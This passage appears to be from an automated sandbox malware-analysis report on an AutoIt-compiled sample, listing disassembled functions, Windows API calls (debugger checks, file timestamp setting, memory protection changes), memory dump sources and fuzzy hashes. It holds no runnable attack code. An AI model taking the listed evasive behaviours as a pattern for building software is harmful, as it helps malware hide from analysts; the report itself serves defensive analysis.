                                          • Part of subcall function 00E96259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00E962B4
                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E8FB2D
                                        • OleInitialize.OLE32(00000000), ref: 00E8FBAA
                                        • CloseHandle.KERNEL32(00000000), ref: 00EC49F2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                        • String ID:
                                        • API String ID: 3094916012-0
                                        • Opcode ID: cd5821d1cadf0c5e21f774c84d14e4693dbb398b338149a92afb343c7db21794
                                        • Instruction ID: 8f2a141738b0ce81484ab6ca98ffe4295d640d5477f8ebe5d884061ded5428a7
                                        • Opcode Fuzzy Hash: cd5821d1cadf0c5e21f774c84d14e4693dbb398b338149a92afb343c7db21794
                                        • Instruction Fuzzy Hash: 8581A9B89013988ECB84EF39E9446657BE4FBAB718314912ADC19D7372EB314448EF13
                                        Function 00E843DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00E84401
                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E844A6
                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E844C3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_$_memset
                                        • String ID:
                                        • API String ID: 1505330794-0
                                        • Opcode ID: 5102a083ead5cb6146017abfc8e58a4517eeb07ccf4aec0512b6e725c34854a5
                                        • Instruction ID: 606e45e8797e771796718368d3b99ad1485dfa36d3387c0bfddf570d25888606
                                        • Opcode Fuzzy Hash: 5102a083ead5cb6146017abfc8e58a4517eeb07ccf4aec0512b6e725c34854a5
                                        • Instruction Fuzzy Hash: 033182B45057059FD720EF24D884697BBE4FB59308F00092EE99ED3290D7B16A48CB52
                                        Function 00EA594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __FF_MSGBANNER.LIBCMT ref: 00EA5963
                                          • Part of subcall function 00EAA3AB: __NMSG_WRITE.LIBCMT ref: 00EAA3D2
                                          • Part of subcall function 00EAA3AB: __NMSG_WRITE.LIBCMT ref: 00EAA3DC
                                        • __NMSG_WRITE.LIBCMT ref: 00EA596A
                                          • Part of subcall function 00EAA408: GetModuleFileNameW.KERNEL32(00000000,00F443BA,00000104,00000000,00000001,00000000), ref: 00EAA49A
                                          • Part of subcall function 00EAA408: ___crtMessageBoxW.LIBCMT ref: 00EAA548
                                          • Part of subcall function 00EA32DF: ___crtCorExitProcess.LIBCMT ref: 00EA32E5
                                          • Part of subcall function 00EA32DF: ExitProcess.KERNEL32 ref: 00EA32EE
                                          • Part of subcall function 00EA8D68: __getptd_noexit.LIBCMT ref: 00EA8D68
                                        • RtlAllocateHeap.NTDLL(01150000,00000000,00000001), ref: 00EA598F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                        • String ID:
                                        • API String ID: 1372826849-0
                                        • Opcode ID: 7f8b470475e39ede2a03d9f0567936cdc29412baa9bf1f97961626c3a6898981
                                        • Instruction ID: 23030575f3f9d229ac55635b7a5e6d0a623a4cf3d815e4f22111f95fa8e2a4d0
                                        • Opcode Fuzzy Hash: 7f8b470475e39ede2a03d9f0567936cdc29412baa9bf1f97961626c3a6898981
                                        • Instruction Fuzzy Hash: 8B019237200B15DEE6212B74E842B6F72D89F9B774F11203AF921BE191DB70BD019661
                                        Function 00EE9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00EE97D2,?,?,?,?,?,00000004), ref: 00EE9B45
                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00EE97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00EE9B5B
                                        • CloseHandle.KERNEL32(00000000,?,00EE97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EE9B62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateHandleTime
                                        • String ID:
                                        • API String ID: 3397143404-0
                                        • Opcode ID: bd0082582c00835aeba93ab7b3a07e56f743035838e0eafe89c3aa081535ba12
                                        • Instruction ID: 55721da648dc94914057bd57881d3c5bbac9887ffb820ab861e0f5ad1880a329
                                        • Opcode Fuzzy Hash: bd0082582c00835aeba93ab7b3a07e56f743035838e0eafe89c3aa081535ba12
                                        • Instruction Fuzzy Hash: 88E0863228031CB7DB311B54EC09FCA7B58BB05B75F104120FB14790E087B12515A798
                                        Function 00EE8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00EE8FA5
                                          • Part of subcall function 00EA2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA9C64), ref: 00EA2FA9
                                          • Part of subcall function 00EA2F95: GetLastError.KERNEL32(00000000,?,00EA9C64), ref: 00EA2FBB
                                        • _free.LIBCMT ref: 00EE8FB6
                                        • _free.LIBCMT ref: 00EE8FC8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                        • Instruction ID: 422a3eacb65f05cf68fe530505b87f88df683eafee8f3cac2fe3b403e2d38f5c
                                        • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                        • Instruction Fuzzy Hash: D6E012B17097494ECA24A57DAE40A9367EF5F4D354718281DB50DFF142DE24F841C128
                                        Function 00E8AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CALL
                                        • API String ID: 0-4196123274
                                        • Opcode ID: a78522de2ef175ac8473ef2aef280e43cf4df0c9b1dea4f836c9ae4adc41eda8
                                        • Instruction ID: 6db9a655afff1dcecaee8c624ecccbc4b3ea5068d406cfa8f460b6e268907d55
                                        • Opcode Fuzzy Hash: a78522de2ef175ac8473ef2aef280e43cf4df0c9b1dea4f836c9ae4adc41eda8
                                        • Instruction Fuzzy Hash: 3E225874508301CFD724EF14C594B6ABBE1BF44304F19996EE89EAB262D731EC81DB82
                                        Function 00E84DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: EA06
                                        • API String ID: 4104443479-3962188686
                                        • Opcode ID: 8f1228f57def7bf90f811c23c9aec4cc82f26e96f818c9f52acca0fbdf70658d
                                        • Instruction ID: e7f373b03c852e17deecc5d826496d211366cf12eebd1b5319409bcaed0958b6
                                        • Opcode Fuzzy Hash: 8f1228f57def7bf90f811c23c9aec4cc82f26e96f818c9f52acca0fbdf70658d
                                        • Instruction Fuzzy Hash: 5B416BB2A046595BCF21BB6488517FE7FE6EB05304F287065FC8EBF2C2D6219D4087A1
                                        Function 00E87BB1 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 888ce228c65e5e126e2c0d83d6bef63a0f4650b727a1fb86e52d4496ebb79edc
                                        • Instruction ID: 98c4056b02495a62aa0e240594df27ff49b34aad743dc01412bd5faee1b390a7
                                        • Opcode Fuzzy Hash: 888ce228c65e5e126e2c0d83d6bef63a0f4650b727a1fb86e52d4496ebb79edc
                                        • Instruction Fuzzy Hash: 9931F4B1604506AFC714EF28C8C1EAAF3E9FF4C3147259229E85DDB291DB70E860CB90
                                        Function 00E8492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                        • 745EC8D0.UXTHEME ref: 00E84992
                                          • Part of subcall function 00EA35AC: __lock.LIBCMT ref: 00EA35B2
                                          • Part of subcall function 00EA35AC: RtlDecodePointer.NTDLL(00000001), ref: 00EA35BE
                                          • Part of subcall function 00EA35AC: RtlEncodePointer.NTDLL(?), ref: 00EA35C9
                                          • Part of subcall function 00E84A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E84A73
                                          • Part of subcall function 00E84A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E84A88
                                          • Part of subcall function 00E83B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E83B7A
                                          • Part of subcall function 00E83B4C: IsDebuggerPresent.KERNEL32 ref: 00E83B8C
                                          • Part of subcall function 00E83B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F462F8,00F462E0,?,?), ref: 00E83BFD
                                          • Part of subcall function 00E83B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00E83C81
                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E849D2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                                        • String ID:
                                        • API String ID: 2688871447-0
                                        • Opcode ID: 9f1984879c6e630f3f98d4758ef9918cb65b7d00b56e9c0d1a06a76fcda1f87d
                                        • Instruction ID: 0375b3ff5ce099e75f472d740f4d201bae23a6dc204592ecedafa332d6a7f71b
                                        • Opcode Fuzzy Hash: 9f1984879c6e630f3f98d4758ef9918cb65b7d00b56e9c0d1a06a76fcda1f87d
                                        • Instruction Fuzzy Hash: 2511C0B1904305AFC700EF68DC4591AFBE8EBAA710F00451EF449972B1DBB09648DB92
                                        Function 00EA582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __lock_file_memset
                                        • String ID:
                                        • API String ID: 26237723-0
                                        • Opcode ID: 3c93ab6d50e460e709024b6613107062e619f942fbd428889e2923e5788c0a11
                                        • Instruction ID: c5b180f7b22ff3d5fe7c46c7d0b2956365c46d923eb7708c8deb52a13ff25773
                                        • Opcode Fuzzy Hash: 3c93ab6d50e460e709024b6613107062e619f942fbd428889e2923e5788c0a11
                                        • Instruction Fuzzy Hash: 3601D832C00608EBCF21AF658D0249E7BA1AF4A760F045229F8143E161DB359A11DB51
                                        Function 00EA55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EA8D68: __getptd_noexit.LIBCMT ref: 00EA8D68
                                        • __lock_file.LIBCMT ref: 00EA561B
                                          • Part of subcall function 00EA6E4E: __lock.LIBCMT ref: 00EA6E71
                                        • __fclose_nolock.LIBCMT ref: 00EA5626
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                        • String ID:
                                        • API String ID: 2800547568-0
                                        • Opcode ID: d5157b05a61ade13c435fa7f9ccb0d2a96cdb5d5913e8b073499c34190aeb8cd
                                        • Instruction ID: 6c25dc46157aeea192dca70064de6668140616aa793eb553487a5491a51ab205
                                        • Opcode Fuzzy Hash: d5157b05a61ade13c435fa7f9ccb0d2a96cdb5d5913e8b073499c34190aeb8cd
                                        • Instruction Fuzzy Hash: 08F0B472900B05DAD720AF75890276E77E16F8B334F55A249E414BF1C1CF7CAA019B55
                                        Function 01190E58 Relevance: 1.7, APIs: 1, Instructions: 161COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 011906C8: GetFileAttributesW.KERNELBASE(?), ref: 011906D3
                                        • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01190F99
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743939760.000000000118F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0118F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_118f000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AttributesCreateDirectoryFile
                                        • String ID:
                                        • API String ID: 3401506121-0
                                        • Opcode ID: 7896e6d4d34022525c962bcf28e537cd5f5748cea084ef479a2ed2fef6ac33bd
                                        • Instruction ID: 5c7ae3853334b8a8275a81afb15e4d309716ac5bd1baaafdedd5e8e629e69c25
                                        • Opcode Fuzzy Hash: 7896e6d4d34022525c962bcf28e537cd5f5748cea084ef479a2ed2fef6ac33bd
                                        • Instruction Fuzzy Hash: 6A519931A1020997EF14EFA0C854BEE7339EF58340F004568F619EB190EB799B85C7A6
                                        Function 00EA0E48 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction ID: 2d6677e2d0cd8337bd09546360c4394c5fa96e62b14930fcfc13b390de096c57
                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction Fuzzy Hash: 7131C170A001059FCB18DF58D480969F7A6FF5A304B64EAA5E409EF651D731EDC1DB80
                                        Function 00EC00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: c1404ba06b50f809c6233cc325d2e03d8e3e97692cab44de2fdf2e288338150c
                                        • Instruction ID: 518853a9a209b56c79e05f1673946c1e27f8557d64a51414f4565d93e9abd310
                                        • Opcode Fuzzy Hash: c1404ba06b50f809c6233cc325d2e03d8e3e97692cab44de2fdf2e288338150c
                                        • Instruction Fuzzy Hash: AA413874504341CFDB24DF14C484B1ABBE0BF45318F0998ACE899AB762C372EC86CB52
                                        Function 00E87CB3 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 1bc2b208b9beaa25c8e830c671147489a028ada373ad6e2fb59623784cc0d928
                                        • Instruction ID: 0bfec24be25f8683b5e1ed74091cf80eeca8a9289f33d8ac910f6fc62a89e036
                                        • Opcode Fuzzy Hash: 1bc2b208b9beaa25c8e830c671147489a028ada373ad6e2fb59623784cc0d928
                                        • Instruction Fuzzy Hash: D1212171604A09EBDB146F25EC817AABBB4FF18360F35946AE88AE50A1EB30D5909701
                                        Function 00E84F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E84D13: FreeLibrary.KERNEL32(00000000,?), ref: 00E84D4D
                                          • Part of subcall function 00EA548B: __wfsopen.LIBCMT ref: 00EA5496
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E84F6F
